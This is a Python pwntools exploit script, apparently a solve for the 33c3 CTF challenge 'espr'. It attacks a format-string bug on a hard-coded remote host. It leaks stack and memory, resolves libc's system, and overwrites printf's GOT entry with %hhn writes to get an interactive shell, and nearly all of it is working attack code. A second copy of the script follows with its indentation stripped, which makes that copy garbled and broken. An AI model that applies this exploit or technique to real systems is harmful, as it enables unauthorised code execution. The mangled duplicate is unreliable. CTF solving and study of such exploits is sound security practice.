CreateRemoteThread/33c3-espr-solve.py

## 33c3-espr-solve.py
#!/usr/bin/python

import binascii
import pwn
import sys
import struct

RHOST = "78.46.224.86"
RPORT = 1337

saveSocket = None

def leakStringAt(s,address):
  data = "%7$pBBBB" + pwn.p64(address)
  if "\n" in data:
    print " [!] newline in payload!"
    return ""
  try:
    s.sendline("%7$sAAAA" + pwn.p64(address))
  except EOFError:
    raise EOFError
  try:
    data = p.recv()
    print " [R] leaked %d bytes at %x" % (len(data.split("AAAA")[0]),address)
  except EOFError:
    print " [X] EOFError trying to leak from %x" % address
    return None
  (code,fuck) = data.split("AAAA")
  return code

def leakFour(address):
  global saveSocket
  try:
    data = leakBlock(saveSocket,address,4)[0:4]
    print binascii.hexlify(data)
    return str(data)
  except:
    return ''

def leakStack(s,start,end):
  out = ""
  for i in range(start,end):
    out += "%%%d$p" % i
  s.sendline(out)
  print s.recv()

def leakStackPivot(s):
  for i in range(1,1000):
    s.sendline("AAAA%4n%" + str(i) + "$p")
    data = p.recv()
    if "0004" in data:
      print " [!] MAYBE FOUND! offset %d : %s" % (i,data)
    else:
      print " [+] offset %d : %s" % (i,data)

def leakBlock(s,address,size):
  remainingSize = size
  out = bytearray("")
  while remainingSize > 0:
    try:
      data = leakStringAt(s,address + size - remainingSize)
    except EOFError:
      return out
    if data == None:
      remainingSize -= 1
    else:
      out += bytearray(data)
      remainingSize -= len(data) + 1
    out += bytearray("\x00")
  return out

def send_payload(payload):
  print repr("AAAA"+payload)
  saveSocket.sendline("AAAA" + payload)
  data = saveSocket.recv()
  print repr(data)
  return data

def leakSystem(s):
  d = pwn.DynELF(leakFour,0x400400)
  system_addr = d.lookup('system','libc')
  print "SYSTEM at 0x%x" % system_addr
  return system_addr

def pad255(string):
  return string + "A" * (256 - len(string))

def convertToMagic(address):
  data = struct.pack("<q",address)
  totalDataWritten = 0
  out = ""
  for i in range(0,len(data)):
    newvalue = ord(data[i])
    if newvalue < totalDataWritten:
      newvalue = 256 - totalDataWritten + newvalue
      out += "%" + str(newvalue) + "c" + "%" + str(38 + i) + "$hhn"
      totalDataWritten = 0
    elif newvalue == 0:
      pass
    elif newvalue == totalDataWritten:
      out += "%" + str(38 + i) + "$hhn"
      newvalue = 0
    else:
      out += "%" + str(newvalue - totalDataWritten) + "c" + "%" + str(38 + i) + "$hhn"
    totalDataWritten += newvalue
    totalDataWritten %= 256
  print out
  return out

if __name__ == "__main__":
  if len(sys.argv) == 4 and sys.argv[1] == "leakstack":
    p = pwn.remote(RHOST,RPORT)
    leakStack(p,int(sys.argv[2],0),int(sys.argv[3],0))
    p.close()
    sys.exit(0)
  elif len(sys.argv) == 2 and sys.argv[1] == "pivot":
    p = pwn.remote(RHOST,RPORT)
    leakStackPivot(p)
    p.close()
    sys.exit(0)
  elif len(sys.argv) == 2 and sys.argv[1] == "dynelf":
    p = pwn.remote(RHOST,RPORT)
    saveSocket = p
    data = leakBlock(p,0x00601018,8)
    d = leakSystem(p)
    print "PRINTF at : " + binascii.hexlify(data)
    # PRINTF ACTUAL: 7f44671dd550
    # SYSTEM ACTUAL: 7f44671cc6d0
    # DIFF: 10e80
    p.close()
    sys.exit(0)
  elif len(sys.argv) == 2 and sys.argv[1] == "exploit":        # this is the right way to do it
    p = pwn.remote(RHOST,RPORT)
    data = leakBlock(p,0x601018,8)
    printf_addr = struct.unpack("<q",data)
    print " PRINTF AT 0x%x" % printf_addr
    system_addr = printf_addr[0] - 0x10e80
    print " SYSTEM AT 0x%x" % system_addr
    print " [!!!] stage 1 complete. try to write 0x%x to 0x601018" % system_addr
    pwn.context.clear(arch='amd64')
    saveSocket = p
    f = pwn.FmtStr(execute_fmt=send_payload,offset=7)
    fmt_payload = pwn.fmtstr_payload(38, {0x601018: system_addr})
    fmt_new = "%".join(fmt_payload.split("%")[1:])
    print " [!] autogen payload = " + fmt_new
    # f.write(0x601018,system_addr)
    # f.execute_writes()
    GOT_ADDR_BLOCK = "\x18\x10\x60\x00\x00\x00\x00\x00\x19\x10\x60\x00\x00\x00\x00\x00\x1a\x10\x60\x00\x00\x00\x00\x00\x1b\x10\x60\x00\x00\x00\x00\x00\x1c\x10\x60\x00\x00\x00\x00\x00\x1d\x10\x60\x00\x00\x00\x00\x00\x1e\x10\x60\x00\x00\x00\x00\x00\x1f\x10\x60\x00\x00\x00\x00\x00"
    PAYLOAD_BLOCK = convertToMagic(system_addr)
    payload_firsttoken = [PAYLOAD_BLOCK.split("c")[0]]
    autogen_tokens = fmt_new.split("c")[1:]
    newmagic = "c".join(payload_firsttoken + autogen_tokens)
    print newmagic
    print " [!!!] sending magic\n"
    p.sendline(pad255(newmagic) + GOT_ADDR_BLOCK)
    print p.recv()
    p.interactive()
    p.close()
    sys.exit(0)
  elif len(sys.argv) == 4 and sys.argv[1] == "leak":
    address = int(sys.argv[2],0)
    size = int(sys.argv[3],0)
    p = pwn.remote(RHOST,RPORT)
    data = leakBlock(p,address,size)
    f = open("%08x.elf" % address,"wb")
    f.write(data)
    f.close()
    # print binascii.hexlify(data)
    print pwn.disasm(data,arch='amd64',vma=address)
    p.close()
    sys.exit(0)
  else:
    print "what do you want?>"
	#!/usr/bin/python

	import binascii
	import pwn
	import sys
	import struct

	RHOST = "78.46.224.86"
	RPORT = 1337

	saveSocket = None

	def leakStringAt(s,address):
	data = "%7$pBBBB" + pwn.p64(address)
	if "\n" in data:
	print " [!] newline in payload!"
	return ""
	try:
	s.sendline("%7$sAAAA" + pwn.p64(address))
	except EOFError:
	raise EOFError
	try:
	data = p.recv()
	print " [R] leaked %d bytes at %x" % (len(data.split("AAAA")[0]),address)
	except EOFError:
	print " [X] EOFError trying to leak from %x" % address
	return None
	(code,fuck) = data.split("AAAA")
	return code

	def leakFour(address):
	global saveSocket
	try:
	data = leakBlock(saveSocket,address,4)[0:4]
	print binascii.hexlify(data)
	return str(data)
	except:
	return ''

	def leakStack(s,start,end):
	out = ""
	for i in range(start,end):
	out += "%%%d$p" % i
	s.sendline(out)
	print s.recv()

	def leakStackPivot(s):
	for i in range(1,1000):
	s.sendline("AAAA%4n%" + str(i) + "$p")
	data = p.recv()
	if "0004" in data:
	print " [!] MAYBE FOUND! offset %d : %s" % (i,data)
	else:
	print " [+] offset %d : %s" % (i,data)

	def leakBlock(s,address,size):
	remainingSize = size
	out = bytearray("")
	while remainingSize > 0:
	try:
	data = leakStringAt(s,address + size - remainingSize)
	except EOFError:
	return out
	if data == None:
	remainingSize -= 1
	else:
	out += bytearray(data)
	remainingSize -= len(data) + 1
	out += bytearray("\x00")
	return out

	def send_payload(payload):
	print repr("AAAA"+payload)
	saveSocket.sendline("AAAA" + payload)
	data = saveSocket.recv()
	print repr(data)
	return data

	def leakSystem(s):
	d = pwn.DynELF(leakFour,0x400400)
	system_addr = d.lookup('system','libc')
	print "SYSTEM at 0x%x" % system_addr
	return system_addr

	def pad255(string):
	return string + "A" * (256 - len(string))

	def convertToMagic(address):
	data = struct.pack("<q",address)
	totalDataWritten = 0
	out = ""
	for i in range(0,len(data)):
	newvalue = ord(data[i])
	if newvalue < totalDataWritten:
	newvalue = 256 - totalDataWritten + newvalue
	out += "%" + str(newvalue) + "c" + "%" + str(38 + i) + "$hhn"
	totalDataWritten = 0
	elif newvalue == 0:
	pass
	elif newvalue == totalDataWritten:
	out += "%" + str(38 + i) + "$hhn"
	newvalue = 0
	else:
	out += "%" + str(newvalue - totalDataWritten) + "c" + "%" + str(38 + i) + "$hhn"
	totalDataWritten += newvalue
	totalDataWritten %= 256
	print out
	return out

	if __name__ == "__main__":
	if len(sys.argv) == 4 and sys.argv[1] == "leakstack":
	p = pwn.remote(RHOST,RPORT)
	leakStack(p,int(sys.argv[2],0),int(sys.argv[3],0))
	p.close()
	sys.exit(0)
	elif len(sys.argv) == 2 and sys.argv[1] == "pivot":
	p = pwn.remote(RHOST,RPORT)
	leakStackPivot(p)
	p.close()
	sys.exit(0)
	elif len(sys.argv) == 2 and sys.argv[1] == "dynelf":
	p = pwn.remote(RHOST,RPORT)
	saveSocket = p
	data = leakBlock(p,0x00601018,8)
	d = leakSystem(p)
	print "PRINTF at : " + binascii.hexlify(data)
	# PRINTF ACTUAL: 7f44671dd550
	# SYSTEM ACTUAL: 7f44671cc6d0
	# DIFF: 10e80
	p.close()
	sys.exit(0)
	elif len(sys.argv) == 2 and sys.argv[1] == "exploit": # this is the right way to do it
	p = pwn.remote(RHOST,RPORT)
	data = leakBlock(p,0x601018,8)
	printf_addr = struct.unpack("<q",data)
	print " PRINTF AT 0x%x" % printf_addr
	system_addr = printf_addr[0] - 0x10e80
	print " SYSTEM AT 0x%x" % system_addr
	print " [!!!] stage 1 complete. try to write 0x%x to 0x601018" % system_addr
	pwn.context.clear(arch='amd64')
	saveSocket = p
	f = pwn.FmtStr(execute_fmt=send_payload,offset=7)
	fmt_payload = pwn.fmtstr_payload(38, {0x601018: system_addr})
	fmt_new = "%".join(fmt_payload.split("%")[1:])
	print " [!] autogen payload = " + fmt_new
	# f.write(0x601018,system_addr)
	# f.execute_writes()
	GOT_ADDR_BLOCK = "\x18\x10\x60\x00\x00\x00\x00\x00\x19\x10\x60\x00\x00\x00\x00\x00\x1a\x10\x60\x00\x00\x00\x00\x00\x1b\x10\x60\x00\x00\x00\x00\x00\x1c\x10\x60\x00\x00\x00\x00\x00\x1d\x10\x60\x00\x00\x00\x00\x00\x1e\x10\x60\x00\x00\x00\x00\x00\x1f\x10\x60\x00\x00\x00\x00\x00"
	PAYLOAD_BLOCK = convertToMagic(system_addr)
	payload_firsttoken = [PAYLOAD_BLOCK.split("c")[0]]
	autogen_tokens = fmt_new.split("c")[1:]
	newmagic = "c".join(payload_firsttoken + autogen_tokens)
	print newmagic
	print " [!!!] sending magic\n"
	p.sendline(pad255(newmagic) + GOT_ADDR_BLOCK)
	print p.recv()
	p.interactive()
	p.close()
	sys.exit(0)
	elif len(sys.argv) == 4 and sys.argv[1] == "leak":
	address = int(sys.argv[2],0)
	size = int(sys.argv[3],0)
	p = pwn.remote(RHOST,RPORT)
	data = leakBlock(p,address,size)
	f = open("%08x.elf" % address,"wb")
	f.write(data)
	f.close()
	# print binascii.hexlify(data)
	print pwn.disasm(data,arch='amd64',vma=address)
	p.close()
	sys.exit(0)
	else:
	print "what do you want?>"